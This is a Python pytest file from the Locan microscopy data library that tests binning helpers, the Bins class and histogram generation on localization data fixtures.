"BSD-3-Clause"
] | 8 | 2021-11-25T20:05:49.000Z | 2022-03-27T17:45:00.000Z | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
"BSD-3-Clause"
] | 4 | 2021-12-15T22:39:20.000Z | 2022-03-11T17:35:34.000Z | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
"BSD-3-Clause"
] | 1 | 2022-03-22T19:53:13.000Z | 2022-03-22T19:53:13.000Z | import boost_histogram as bh
import numpy as np
import pytest
from locan import Bins, histogram
from locan.data.aggregate import (
_bin_edges_to_bin_centers,
_bin_edges_to_bin_size,
_bin_edges_to_bin_size_one_dimension,
_bin_edges_to_n_bins,
_bin_edges_to_n_bins_one_dimension,
_bin_size_to_bin_edges_one_dimension,
_BinsFromBoostHistogramAxis,
_BinsFromEdges,
_BinsFromNumber,
_BinsFromSize,
_indices_to_bin_centers,
_is_1d_array_of_scalar,
_is_1d_array_of_two_scalar,
_is_2d_homogeneous_array,
_is_2d_inhomogeneous_array,
_is_2d_inhomogeneous_array_of_1d_array_of_scalar,
_is_scalar,
_is_single_element,
_n_bins_to_bin_edges_one_dimension,
)
data_scalars = {"1": 1, "()": ()}
data_tuples = {
"((),)": ((),),
"(1,)": (1,),
"(1, 2)": (1, 2),
"(1, 2, 3)": (1, 2, 3),
"((1, 2),)": ((1, 2),),
"((1, 2), (1, 2))": ((1, 2), (1, 2)),
"((1, 2), (1, 2, 3))": ((1, 2), (1, 2, 3)),
"((1, 2), ((1, 2), (1, 2)))": ((1, 2), ((1, 2), (1, 2))),
"(1, (1, 2))": (1, (1, 2)),
}
data_lists = {
"[[]]": [[]],
"[1]": [1],
"[1, 2]": [1, 2],
"[1, 2, 3]": [1, 2, 3],
"[[1, 2]]": [[1, 2]],
"[[1, 2], [1, 2]]": [[1, 2], [1, 2]],
"[[1, 2], [1, 2, 3]]": [[1, 2], [1, 2, 3]],
"[[1, 2], [[1, 2], [1, 2]]]": [[1, 2], [[1, 2], [1, 2]]],
"[1, [1, 2]]": [1, [1, 2]],
}
data_ndarrays = {
"np.array((1))": np.array((1)),
"np.array((1,))": np.array((1,)),
"np.array((1, 2))": np.array((1, 2)),
"np.array([(1, 2)])": np.array([(1, 2)]),
"np.array([(1, 2)], dtype=object)": np.array([(1, 2)], dtype=object),
"np.array([(1, 2), (1, 2, 3)], dtype=object)": np.array(
[(1, 2), (1, 2, 3)], dtype=object
),
}
data_all = {**data_scalars, **data_tuples, **data_lists, **data_ndarrays}
expect_is_scalar = ["1", "np.array((1))"]
expect_is_single_element = ["1", "(1,)", "[1]", "np.array((1))", "np.array((1,))"]
expect_is_1d_array_of_scalar = [
"(1, 2)",
"(1, 2, 3)",
"[1, 2]",
"[1, 2, 3]",
"np.array((1, 2))",
"(1,)",
"[1]",
"np.array((1,))",
]
expect_is_1d_array_of_two_scalar = ["(1, 2)", "[1, 2]", "np.array((1, 2))"]
expect_is_2d_homogeneous_array = [
"((1, 2),)",
"((1, 2), (1, 2))",
"[[1, 2]]",
"[[1, 2], [1, 2]]",
"np.array([(1, 2)])",
]
expect_is_2d_inhomogeneous_array = [
"((1, 2), (1, 2, 3))",
"(1, (1, 2))",
"[[1, 2], [1, 2, 3]]",
"[1, [1, 2]]",
"np.array([(1, 2), (1, 2, 3)], dtype=object)",
]
expect_is_2d_inhomogeneous_array_of_1d_array_of_scalar = [
"((1, 2), (1, 2, 3))",
"[[1, 2], [1, 2, 3]]",
"np.array([(1, 2), (1, 2, 3)], dtype=object)",
]
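# Each predicate test below checks every fixture in data_all against the matching expect_* list.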
def test__is_scalar():
for key, value in data_all.items():
if key in expect_is_scalar:
assert _is_scalar(value)
else:
assert not _is_scalar(value)
def test__is_single_element():
for key, value in data_all.items():
if key in expect_is_single_element:
assert _is_single_element(value)
else:
assert not _is_single_element(value)
def test__is_1d_array_of_scalar():
for key, value in data_all.items():
if key in expect_is_1d_array_of_scalar:
assert _is_1d_array_of_scalar(value)
else:
assert not _is_1d_array_of_scalar(value)
def test__is_1d_array_of_two_scalar():
for key, value in data_all.items():
if key in expect_is_1d_array_of_two_scalar:
assert _is_1d_array_of_two_scalar(value)
else:
assert not _is_1d_array_of_two_scalar(value)
def test__is_2d_homogeneous_array():
for key, value in data_all.items():
if key in expect_is_2d_homogeneous_array:
assert _is_2d_homogeneous_array(value)
else:
assert not _is_2d_homogeneous_array(value)
def test__is_2d_inhomogeneous_array():
for key, value in data_all.items():
if key in expect_is_2d_inhomogeneous_array:
assert _is_2d_inhomogeneous_array(value)
else:
assert not _is_2d_inhomogeneous_array(value)
def test__is_2d_inhomogeneous_array_of_1d_array_of_scalar():
for key, value in data_all.items():
if key in expect_is_2d_inhomogeneous_array_of_1d_array_of_scalar:
assert _is_2d_inhomogeneous_array_of_1d_array_of_scalar(value)
else:
assert not _is_2d_inhomogeneous_array_of_1d_array_of_scalar(value)
def test__n_bins_to_bin_edges_one_dimension():
bin_edges = _n_bins_to_bin_edges_one_dimension(10, (10, 20))
assert bin_edges.shape == (11,)
def test__bin_size_to_bin_edges_one_dimension():
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=None)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9))
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=True)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9, 13))
bin_edges = _bin_size_to_bin_edges_one_dimension(4, (1, 10), extend_range=False)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 5, 9, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=None)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=True)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 21))
bin_edges = _bin_size_to_bin_edges_one_dimension(20, (1, 10), extend_range=False)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=None
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=True
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10, 12))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(1, 2, 3, 3, 2), (1, 11), extend_range=False
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2, 4, 7, 10, 11))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=None
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=True
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 11))
bin_edges = _bin_size_to_bin_edges_one_dimension(
(10, 20, 30), (1, 2), extend_range=False
)
assert isinstance(bin_edges, np.ndarray)
assert np.array_equal(bin_edges, (1, 2))
with pytest.raises(TypeError):
_bin_size_to_bin_edges_one_dimension(((4,), 2), (0, 10), extend_range=False)
def test__bin_edges_to_n_bins_one_dimension():
n_bins = _bin_edges_to_n_bins_one_dimension((1, 3, 5))
assert n_bins == 2
n_bins = _bin_edges_to_n_bins_one_dimension([1, 2, 4])
assert n_bins == 2
def test__bin_edges_to_n_bins():
n_bins = _bin_edges_to_n_bins([1, 3, 5])
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins(([1, 3, 5],))
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins([1, 2, 4])
assert n_bins == (2,)
n_bins = _bin_edges_to_n_bins(((1, 3, 5), (1, 2, 4, 5)))
assert np.array_equal(n_bins, (2, 3))
n_bins = _bin_edges_to_n_bins([[1, 3, 5], [1, 2, 3, 4]])
assert np.array_equal(n_bins, (2, 3))
n_bins = _bin_edges_to_n_bins(np.array([[1, 3, 5], [1, 2, 3]]))
assert np.array_equal(n_bins, (2, 2))
def test__bin_edges_to_bin_size_one_dimension():
bin_size = _bin_edges_to_bin_size_one_dimension((1, 3, 5))
assert bin_size == 2
bin_size = _bin_edges_to_bin_size_one_dimension([1, 2, 4])
assert np.array_equal(bin_size, (1, 2))
bin_size = _bin_edges_to_bin_size_one_dimension([1, 2])
assert bin_size == 1
def test__bin_edges_to_bin_size():
bin_size = _bin_edges_to_bin_size([1, 3, 5])
assert bin_size == (2,)
bin_size = _bin_edges_to_bin_size(([1, 3, 5],))
assert bin_size == (2,)
bin_size = _bin_edges_to_bin_size([1, 2, 4])
assert np.array_equal(bin_size[0], (1, 2))
bin_size = _bin_edges_to_bin_size(((1, 3, 5), (1, 2, 4, 5)))
assert bin_size[0] == 2
assert np.array_equal(bin_size[1], (1, 2, 1))
bin_size = _bin_edges_to_bin_size([[1, 3, 5], [1, 2, 3, 4]])
assert bin_size == (2, 1)
bin_size = _bin_edges_to_bin_size(np.array([[1, 3, 5], [1, 2, 3]]))
assert bin_size == (2, 1)
def test__bin_edges_to_bin_centers():
bin_centers = _bin_edges_to_bin_centers([1, 3, 5])
assert np.array_equal(bin_centers, ((2, 4),))
bin_centers = _bin_edges_to_bin_centers(([1, 3, 5],))
assert np.array_equal(bin_centers, ((2, 4),))
bin_centers = _bin_edges_to_bin_centers(((1, 3, 5), (1, 2, 4, 6)))
expected = ((2, 4), (1.5, 3, 5))
for bc, ex in zip(bin_centers, expected):
assert np.array_equal(bc, ex)
bin_edges = np.array([[0, 1, 2, 4, 8, 9], [0, 1, 4, 8]], dtype=object)
bin_centers = _bin_edges_to_bin_centers(bin_edges)
expected = (np.array([0.5, 1.5, 3.0, 6, 8.5]), np.array([0.5, 2.5, 6]))
for bc, ex in zip(bin_centers, expected):
assert np.array_equal(bc, ex)
def test__indices_to_bin_centers():
indices = 2
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = 3
assert np.array_equal(bin_centers, expected)
indices = np.array([0, 2, 1])
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([0.5, 3, 1.5])
assert np.array_equal(bin_centers, expected)
indices = np.array([[0, 1], [2, 2], [4, 3]])
bin_edges = np.array([0, 1, 2, 4, 8, 9])
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([[0.5, 1.5], [3, 3], [8.5, 6]])
assert np.array_equal(bin_centers, expected)
indices = np.array([[0, 1], [2, 2], [4, 3]])
bin_edges = np.array([[0, 1, 2, 4, 8, 9], [1, 2, 4, 8, 9]], dtype=object)
bin_centers = _indices_to_bin_centers(bin_edges, indices)
expected = np.array([[0.5, 3], [3, 6], [8.5, 8.5]])
assert np.array_equal(bin_centers, expected)
def test__BinsFromBoostHistogramAxis():
bhaxis = bh.axis.Regular(5, 0, 10)
bins = _BinsFromBoostHistogramAxis(bins=bhaxis)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == ((2, 2, 2, 2, 2),)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
bhaxes = bh.axis.AxesTuple((bh.axis.Regular(5, 0, 10), bh.axis.Regular(2, 0, 10)))
bins = _BinsFromBoostHistogramAxis(bins=bhaxes)
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 2)
assert bins.bin_size == ((2.0, 2.0, 2.0, 2.0, 2.0), (5.0, 5.0))
expected_edges = [np.array([0, 2, 4, 6, 8, 10]), np.array([0, 5, 10])]
for bin_edges, edges in zip(bins.bin_edges, expected_edges):
assert np.array_equal(bin_edges, edges)
expected_centers = [np.array([1, 3, 5, 7, 9]), np.array([2.5, 7.5])]
for bin_centers, expected_cents in zip(bins.bin_centers, expected_centers):
assert np.array_equal(bin_centers, expected_cents)
def test__BinsFromEdges():
bins = _BinsFromEdges(bin_edges=(0, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 4.0),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
bins = _BinsFromEdges(bin_edges=((0, 2, 4),))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 4.0),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
bins = _BinsFromEdges(bin_edges=(1, 2, 5))
assert bins.dimension == 1
assert bins.bin_range == ((1, 5),)
assert bins.n_bins == (2,)
assert np.array_equal(bins.bin_size[0], np.array([1, 3]))
assert np.array_equal(bins.bin_edges[0], np.array([1, 2, 5]))
bins = _BinsFromEdges(bin_edges=((0, 2, 4), (1, 2, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 4.0), (1.0, 5.0))
assert bins.n_bins == (2, 2)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], np.array([1, 3]))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
assert np.array_equal(bins.bin_edges[-1], np.array([1, 2, 5]))
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=())
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=[(0, 2, 4), ((0, 2, 4), (0, 2, 4))])
with pytest.raises(TypeError):
_BinsFromEdges(bin_edges=[(0, 2, 4), 2])
def test__BinsFromNumber_():
bins = _BinsFromNumber(n_bins=5, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromNumber(n_bins=(5,), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromNumber(n_bins=(2, 5), bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 5)
assert bins.bin_size == (5, 1)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 2, 3, 4, 5]))
bins = _BinsFromNumber(n_bins=2, bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 2)
assert bins.bin_size == (5, 2.5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2.5, 5]))
bins = _BinsFromNumber(n_bins=(2, 5, 2), bin_range=(0, 10))
assert bins.dimension == 3
assert bins.bin_range == ((0, 10), (0, 10), (0, 10))
assert bins.n_bins == (2, 5, 2)
assert bins.bin_size == (5, 2, 5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[2], np.array([0, 5, 10]))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=5, bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5, (1, 2)), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5,), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2,), bin_range=((0, 10), (0, 5)))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=1)
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(2, 5, 2), bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromNumber(n_bins=(5, (1, 2)), bin_range=(1, 2))
def test__BinsFromSize():
bins = _BinsFromSize(bin_size=2, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromSize(bin_size=(2,), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
bins = _BinsFromSize(bin_size=((1, 2, 3, 4),), bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (4,)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=3, bin_range=(0, 10), extend_range=False)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (4,)
assert np.array_equal(bins.bin_size[0], (3.0, 3.0, 3.0, 1.0))
assert np.array_equal(bins.bin_edges[0], np.array([0, 3, 6, 9, 10]))
bins = _BinsFromSize(bin_size=(5, 1), bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 5))
assert bins.n_bins == (2, 5)
assert bins.bin_size == (5, 1)
assert np.array_equal(bins.bin_edges[0], np.array([0, 5, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 2, 3, 4, 5]))
bins = _BinsFromSize(bin_size=2, bin_range=((0, 10), (0, 5)))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 4))
assert bins.n_bins == (5, 2)
assert bins.bin_size == (2, 2)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 2, 4]))
bins = _BinsFromSize(bin_size=(2, 5), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0, 10), (0, 10))
assert bins.n_bins == (5, 2)
assert bins.bin_size == (2, 5)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 5, 10]))
bins = _BinsFromSize(bin_size=((1, 2, 3, 4), (1, 2, 3, 1)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 7.0))
assert bins.n_bins == (4, 4)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 1))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 7]))
bins = _BinsFromSize(
bin_size=((1, 2, 3, 4), (1, 2, 3, 4)), bin_range=((0, 10), (0, 10))
)
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (4, 4)
assert np.array_equal(bins.bin_size[0], (1, 2, 3, 4))
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 3, 6, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=(2, (1, 2, 3, 4)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 4)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
bins = _BinsFromSize(bin_size=(2, (1, 2, 3, 4)), bin_range=((0, 10), (0, 20)))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 10.0))
assert bins.n_bins == (5, 4)
assert bins.bin_size[0] == 2
assert np.array_equal(bins.bin_size[1], (1, 2, 3, 4))
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_edges[1], np.array([0, 1, 3, 6, 10]))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=5, bin_range=(0,))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=5, bin_range=(1, 2, 3))
with pytest.raises(TypeError):
_BinsFromSize(bin_size=(2, 2, (1, 2, 3, 4)), bin_range=((0, 10), (0, 20)))
with pytest.raises(TypeError):
_BinsFromSize(
bin_size=((1, 2, 3, 4), (1, 2, 3, 4), (1, 2, 3, 4)),
bin_range=((0, 10), (0, 20)),
)
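# Bins is the public interface: it can be built from bin_edges, n_bins, bin_size, another Bins
# instance, or a boost-histogram axis.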
def test_Bins():
bins = Bins(bin_edges=(0, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (2,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3]))
assert bins.is_equally_sized == (True,)
bins = Bins(n_bins=5, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(bin_size=2, bin_range=(0, 10))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(bin_size=(2, (1, 2, 3)), bin_range=(0, 10))
assert bins.dimension == 2
assert bins.bin_range == ((0.0, 10.0), (0.0, 6.0))
assert bins.n_bins == (5, 3)
assert np.array_equal(bins.bin_size[0], 2)
assert np.array_equal(bins.bin_size[1], (1, 2, 3))
assert bins.is_equally_sized == (True, False)
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10)))
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == (2,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
bins = Bins(n_bins=(2, 5), bin_range=(0, 10), labels=["position_x", "position_y"])
assert bins.labels == ["position_x", "position_y"]
assert bins.dimension == 2
assert bins.is_equally_sized == (True, True)
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10)), labels=["position_x"])
assert bins.labels == ["position_x"]
assert bins.dimension == 1
bins = Bins(bins=Bins(n_bins=5, bin_range=(0, 10), labels=["position_x"]))
assert bins.labels == ["position_x"]
assert bins.dimension == 1
with pytest.raises(ValueError):
Bins(n_bins=5, bin_range=(0, 10), labels=["position_x", "position_y"])
def test_Bins_with_boost_histogram():
bhaxis = bh.axis.Regular(5, 0, 10)
bins = Bins(bins=bhaxis)
assert bins.dimension == 1
assert bins.bin_range == ((0.0, 10.0),)
assert bins.n_bins == (5,)
assert bins.bin_size == ((2, 2, 2, 2, 2),)
assert np.array_equal(bins.bin_edges[0], np.array([0, 2, 4, 6, 8, 10]))
assert np.array_equal(bins.bin_centers[0], np.array([1, 3, 5, 7, 9]))
assert bins.is_equally_sized == (True,)
def test_Bins_methods():
bins = Bins(bin_edges=(0, 1, 2, 4))
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (3,)
assert np.array_equal(bins.bin_size[0], (1, 1, 2))
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 2, 4]))
assert bins.is_equally_sized == (False,)
bins = Bins(bin_edges=(0, 1, 2, 4)).equalize_bin_size()
assert bins.dimension == 1
assert bins.bin_range == ((0, 4),)
assert bins.n_bins == (4,)
assert bins.bin_size == (1,)
assert np.array_equal(bins.bin_edges[0], np.array([0, 1, 2, 3, 4]))
assert bins.is_equally_sized == (True,)
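# histogram() bins localization data and returns an array plus labels: counts per bin by default,
# or another localization property when other_property is given.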
def test_histogram(locdata_blobs_2d):
hist = histogram(locdata_blobs_2d, n_bins=10)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 2
assert np.max(hist.data) == 7
hist = histogram(locdata_blobs_2d, n_bins=10, bin_range=((500, 1000), (500, 1000)))
assert hist.data.ndim == 2
assert np.max(hist.data) == 5
assert hist.data.shape == (10, 10)
hist = histogram(locdata_blobs_2d, bin_size=10, loc_properties="position_x")
assert hist.labels == ["position_x", "counts"]
assert hist.data.shape == (89,)
with pytest.raises(ValueError):
histogram(
locdata_blobs_2d,
bin_size=10,
loc_properties="position_x",
bin_range=((500, 1000), (500, 1000)),
)
hist = histogram(locdata_blobs_2d, bin_size=10, loc_properties=["position_x"])
assert hist.labels == ["position_x", "counts"]
assert hist.data.shape == (89,)
hist = histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "position_y"]
)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.shape == (89, 55)
hist = histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "cluster_label"]
)
assert hist.labels == ["position_x", "cluster_label", "counts"]
assert hist.data.shape == (89, 1)
with pytest.raises(ValueError):
histogram(locdata_blobs_2d, bin_size=10, loc_properties="position_z")
with pytest.raises(ValueError):
histogram(locdata_blobs_2d, bin_size=10, loc_properties=["position_z"])
with pytest.raises(ValueError):
histogram(
locdata_blobs_2d, bin_size=10, loc_properties=["position_x", "position_z"]
)
hist = histogram(
locdata_blobs_2d,
bin_edges=((500, 600, 700, 800, 900, 1000), (500, 600, 700, 800, 900, 1000)),
)
assert hist.data.ndim == 2
assert np.max(hist.data) == 7
hist = histogram(locdata_blobs_2d, bin_size=10, other_property="position_y")
assert hist.labels == ["position_x", "position_y", "position_y"]
assert hist.data.shape == (89, 55)
def test_histogram_1d(locdata_1d):
hist = histogram(locdata_1d, n_bins=10)
assert hist.labels == ["position_x", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 1
assert np.max(hist.data) == 2
assert hist.data.shape == (10,)
hist = histogram(locdata_1d, n_bins=5, bin_range=(5, 10))
assert np.max(hist.data) == 1
assert hist.data.shape == (5,)
hist = histogram(locdata_1d, bin_edges=(5, 6, 7, 8, 9, 10))
assert hist.data.shape == (5,)
hist = histogram(locdata_1d, n_bins=10, other_property="intensity")
assert hist.labels == ["position_x", "intensity"]
assert hist.data.shape == (10,)
assert np.nanmax(hist.data) == 125
def test_histogram_3d(locdata_blobs_3d):
hist = histogram(locdata_blobs_3d, n_bins=10)
assert hist.labels == ["position_x", "position_y", "position_z", "counts"]
assert hist.data.dtype == "float64"
assert hist.data.ndim == 3
assert np.max(hist.data) == 6
assert hist.data.shape == (10, 10, 10)
hist = histogram(
locdata_blobs_3d, n_bins=10, bin_range=((500, 1000), (500, 1000), (500, 1000))
)
assert np.max(hist.data) == 4
assert hist.data.shape == (10, 10, 10)
hist = histogram(
locdata_blobs_3d,
bin_edges=(
(500, 600, 700, 800, 900, 1000),
(500, 600, 700, 800, 900, 1000),
(500, 600, 700, 800, 900, 1000),
),
)
assert hist.data.shape == (5, 5, 5)
hist = histogram(locdata_blobs_3d, n_bins=10, other_property="position_y")
assert hist.labels == ["position_x", "position_y", "position_z", "position_y"]
assert hist.data.shape == (10, 10, 10)
assert np.nanmax(hist.data) == 787
def test_histogram_empty(locdata_empty):
with pytest.raises(TypeError):
hist = histogram(locdata_empty, n_bins=10)
def test_histogram_single_value(locdata_single_localization_3d):
hist = histogram(locdata_single_localization_3d, n_bins=3)
assert hist.data.shape == (3, 3, 3)
assert np.array_equal(hist.bins.bin_range, [[1, 2], [1, 2], [1, 2]])
hist = histogram(locdata_single_localization_3d, bin_size=0.2)
assert hist.data.shape == (5, 5, 5)
assert np.array_equal(
hist.bins.bin_range,
[[1, pytest.approx(2)], [1, pytest.approx(2)], [1, pytest.approx(2)]],
)
hist = histogram(locdata_single_localization_3d, bin_size=2)
assert hist.data.shape == (1, 1, 1)
assert np.array_equal(hist.bins.bin_range, [[1, 2], [1, 2], [1, 2]])
def test_histogram_2d_negative_values(locdata_2d_negative):
hist = histogram(locdata_2d_negative, n_bins=10)
assert hist.labels == ["position_x", "position_y", "counts"]
assert hist.data.shape == (10, 10)
